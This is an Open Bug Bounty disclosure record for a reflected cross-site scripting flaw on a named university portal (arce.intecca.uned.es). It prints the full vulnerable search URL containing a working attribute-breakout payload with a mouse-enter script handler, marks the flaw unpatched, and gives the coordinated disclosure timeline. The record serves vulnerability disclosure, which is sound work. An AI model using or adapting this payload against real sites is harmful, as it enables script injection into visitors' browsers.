arce.intecca.uned.es XSS vulnerability

2017-09-29T03:38:00
ID OBB:317716
Type openbugbounty
Reporter Chris5389
Modified 2017-12-28T09:39:00

Description

Vulnerable URL:
https://arce.intecca.uned.es/portal/intranet/search.php?cpath=1%22%27%20Style=position:fixed;top:0;left:0;font-size:999px;%20OnMouseEnter=confirm`1`%20//&cal;=2cd55babf51b053ea15d37dc795143fd%2C01_conferenciasOnline%2C02_videoconferencias%2C03_eventos%2C04_cursos%2C05_nivel1plus%2C06_pruebas%2C07_Ponferrada%2C08_Campus_Suroeste%2C09_video_streaming%2C10_anulado%2C11_formacion&getdate;=20170504&query;=sdfbgsdfg&submit.x;=0&submit.y;=0#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 September, 2017 03:38 GMT
Vulnerability existence verified and confirmed| 29 September, 2017 08:38 GMT
Generic security notifications sent to website owner| 29 September, 2017 08:38 GMT
Notification sent to subscribers (without technical details)| 29 September, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 28 December, 2017 09:39 GMT